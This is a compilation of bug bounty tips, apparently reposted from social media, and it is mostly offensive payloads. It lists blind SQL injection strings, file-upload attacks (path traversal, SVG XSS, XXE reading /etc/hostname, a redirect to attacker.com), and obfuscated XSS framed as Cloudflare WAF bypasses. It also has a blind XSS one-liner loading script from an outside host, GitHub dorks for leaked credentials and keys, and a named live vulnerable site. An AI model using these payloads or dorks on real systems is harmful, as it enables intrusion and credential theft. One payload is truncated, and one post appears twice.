Bug bounty Tips

🚨Subdominator - Unleash the Power of Subdomain Enumeration🚨 📢Subdominator is a powerful tool for passive subdomain enumeration during bug hunting and reconnaissance processes. It is designed to help researchers and cybersecurity professionals discover potential security vulnerabilities by efficiently enumerating subdomains some various free passive resources. 🔗Link- https://github.com/RevoltSecurities/Subdominator

Tip : Extract IPS From list of domains and then you can conduct your FUZZ/Manually check them for SDE /BAC , Ports , ..etc

grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'

#BugBounty #bugbountytips

Tip : Extract IPS From list of domains and then you can conduct your FUZZ/Manually check them for SDE /BAC , Ports , ..etc

grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'

#BugBounty #bugbountytips

this is the top xor blind payloads i collected that most guys used including my personal also that will sure help you :) 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'X 0"XOR(if(now()=sysdate(),sleep(10),0))XOR"Z 'XOR(if((select now()=sysdate()),sleep(10),0))XOR'Z X'XOR(if(now()=sysdate(),//sleep(5)//,0))XOR'X X'XOR(if(now()=sysdate(),(sleep((((5))))),0))XOR'X X'XOR(if((select now()=sysdate()),BENCHMARK(1000000,md5('xyz')),0))XOR'X 'XOR(SELECT(0)FROM(SELECT(SLEEP(9)))a)XOR'Z (SELECT(0)FROM(SELECT(SLEEP(6)))a) 'XOR(if(now()=sysdate(),sleep(5*5),0))OR' 'XOR(if(now()=sysdate(),sleep(5*5*0),0))OR' (SELECT * FROM (SELECT(SLEEP(5)))a) '%2b(select*from(select(sleep(5)))a)%2b' CASE//WHEN(LENGTH(version())=10)THEN(SLEEP(6*1))END ');(SELECT 4564 FROM PG_SLEEP(5))-- ["')//OR//MID(0x352e362e33332d6c6f67,1,1)//LIKE//5//%23"] DBMS_PIPE.RECEIVE_MESSAGE(%5BINT%5D,5)%20AND%20%27bar%27=%27bar AND 5851=DBMS_PIPE.RECEIVE_MESSAGE([INT],5) AND 'bar'='bar 1' AND (SELECT 6268 FROM (SELECT(SLEEP(5)))ghXo) AND 'IKlK'='IKlK (select*from(select(sleep(20)))a) '%2b(select*from(select(sleep(0)))a)%2b' *'XOR(if(2=2,sleep(10),0))OR' -1' or 1=IF(LENGTH(ASCII((SELECT USER())))>13, 1, 0)--// '+(select*from(select(if(1=1,sleep(20),false)))a)+'" 2021 AND (SELECT 6868 FROM (SELECT(SLEEP(32)))IiOE) BENCHMARK(10000000,MD5(CHAR(116))) '%2bbenchmark(10000000%2csha1(1))%2b' '%20and%20(select%20%20from%20(select(if(substring(user(),1,1)='p',sleep(5),1)))a)--%20 - true polyglots payloads: if(now()=sysdate(),sleep(3),0)/'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"/ if(now()=sysdate(),sleep(10),0)/'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0) and 1=1)"/

🖥Chaining Vulnerabilities through File Upload🖥 SLQi⏳

'sleep(20).jpg
sleep(25)-- -.jpg

Path traversal⏳

../../etc/passwd/logo.png
../../../logo.png

XSS⏳

->  Set file name filename="svg onload=alert(document.domain)>" , filename="58832_300x300.jpg<svg onload=confirm()>"

->  Upload using .gif file
GIF89a/<svg/onload=alert(1)>/=alert(document.domain)//;

-> Upload using .svg file
<svg xmlns="w3.org/2000/svg" onload="alert(1)"/>

-> <?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "w3.org/Graphics/SVG/1…"><svg version="1.1" baseProfile="full" xmlns="w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("HolyBugx XSS");
   </script>
</svg>

Open redirect ⏳

<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='attacker.com'"
xmlns="w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</svg>
</code>

XXE ⏳

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="500px" height="500px" xmlns="w3.org/2000/svg" xmlns:xlink="w3.org/1999/xlink" version="1.1
<text font-size="40" x="0" y="16">&xxe;</text>
</svg>

🔥🔥Github-Dork🚀🚀🔥🔥 Happy Hunting 🔍 api_key 🔍 app_AWS_SECRET_ACCESS_KEY 🔍 app_secret 🔍 authoriztion 🔍 Ldap 🔍 aws_access_key_id 🔍 secret 🔍 bash_history 🔍 bashrc%20password 🔍 beanstalkd 🔍 client secre 🔍 composer 🔍 config 🔍 credentials 🔍 DB_PASSWORD 🔍 dotfiles 🔍 .env file 🔍 .exs file 🔍 extension:json mongolab.com 🔍 extension:pem%20private 🔍 extension:ppk private 🔍 extension:sql mysql dump 🔍 extension:yaml mongolab.com 🔍 .mlab.com password 🔍 mysql 🔍 npmrc%20_auth 🔍 passwd 🔍 passkey 🔍 rds.amazonaws.com password 🔍 s3cfg 🔍 send_key 🔍 token 🔍 filename:.bash_history 🔍 filename:.bash_profile aws 🔍 filename:.bashrc mailchimp 🔍 filename:CCCam.cfg 🔍 filename:config irc_pass 🔍 filename:config.php dbpasswd 🔍 filename:config.json auths 🔍 filename:config.php pass 🔍 filename:config.php dbpasswd 🔍 filename:connections.xml 🔍 filename:.cshrc 🔍 filename:.git-credentials 🔍 filename:.ftpconfig 🔍 filename:.history 🔍 filename:gitlab-recovery-codes.txt 🔍 filename:.htpasswd 🔍 filename:id_rsa 🔍 filename:.netrc password 🔍 FTP 🔍 filename:wp-config.php 🔍 git-credentials 🔍 github_token 🔍 HEROKU_API_KEY language:json 🔍 HEROKU_API_KEY language:shell 🔍 GITHUB_API_TOKEN language:shell 🔍 oauth 🔍 OTP 🔍 databases password 🔍 [WFClient] Password= extension:ica 🔍 xoxa_Jenkins 🔍 security_credentials #bugbountytips #GitHub

https://t.me/bug_hunting_talks This is my discussion group you guys can joint

Case Insensitivity Vulnerability

/api/docs/index.html ==> 403 Forbidden
/api/Docs/index.html ==> 200 Ok

Look into subdomains that allow sign-in with Google, as they may contain sensitive information accessible only to team members. Dork: site:*.example.com inurl:login | inurl:signin Google

Dork: Apache Server Leakage

inurl:server-status "apache server status" "cpu usage"

Reference: https://medium.com/@ghostlulzhacks/apache-server-status-a70abed83f5a Vulnerable Site- https://www.itronot.co.il/server-status

Google Dork - High % keywords 🚀 inurl:conf | inurl:env | inurl:cgi | inurl:bin | inurl:etc | inurl:root | inurl:sql | inurl:backup | inurl:admin | inurl:php site:example[.]com

Google Dork - Server Errors ⚡ inurl:"error" | intitle:"exception" | intitle:"failure" | intitle:"server at" | inurl:exception | "database error" | "SQL syntax" | "undefined index" | "unhandled exception" | "stack trace" site:example[.]com

Google Dork - Sensitive Docs 📄 ext:txt | ext:pdf | ext:xml | ext:xls | ext:xlsx | ext:ppt | ext:pptx | ext:doc | ext:docx intext:“confidential” | intext:“Not for Public Release” | intext:”internal use only” | intext:“do not distribute”

📢a XSS payload, Cuneiform-alphabet based ! This payload was on trend back in 2020, but it still works :) 𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++], 𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀] +(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀] +𒀟]𒁹")() (Cuneiform is a logo-syllabic script that was used to write several languages of the Ancient Near East. The script was in active use from the early Bronze Age until the beginning of the Common Era. It is named for the characteristic wedge-shaped impressions (Latin: cuneus) which form its signs.) Source - Wikipedia

New Xss Fly Under Radar Cloudflare Bypass 🧱 Payload : "> Credit -Halim

New XSS Bypass Cloudflare WAF 🧱 Payload : %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E

🫡Automate Your XSS

#!/bin/bash read TARGET subfinder -d $TARGET -silent | tee domains.txt cat domains.txt | waybackurls | tee waybackurls.txt cat waybackurls.txt | dalfox pipe

Blind XSS In X-Forwarded-For Header

subfinder -d http://target.com | gau | bxss -payload '"><script src=https://hacker.xss.ht></script>' -header "X-Forwarded-For"

XSS Oneliner

echo "testphp.vulnweb.com" | katana -passive -pss waybackarchive,commoncrawl,alienvault | uro | gf xss | Gxss -p XSSRef | dalfox pipe

subfinder -d testphp.vulnweb.com -silent | katana -passive -pss waybackarchive,commoncrawl,alienvault | uro | gf xss | Gxss -p XSSRef | dalfox pipe

XSS Tip: If alert() is being converted to ALERT() and you can use Like onerror="𐂃='',𐃨=!𐂃+𐂃,𐂝=!𐃨+𐂃,𐃌=𐂃+{},𐁉=𐃨[𐂃++],𐃵=𐃨[𐂓=𐂃],𐀜=++𐂓+𐂃,𐂠=𐃌[𐂓+𐀜],𐃨[𐂠+=𐃌[𐂃]+(𐃨.𐂝+𐃌)[𐂃]+𐂝[𐀜]+𐁉+𐃵+𐃨[𐂓]+𐂠+𐁉+𐃌[𐂃]+𐃵][𐂠](𐂝[𐂃]+𐂝[𐂓]+𐃨[𐀜]+𐃵+𐁉+'(𐂃)')()"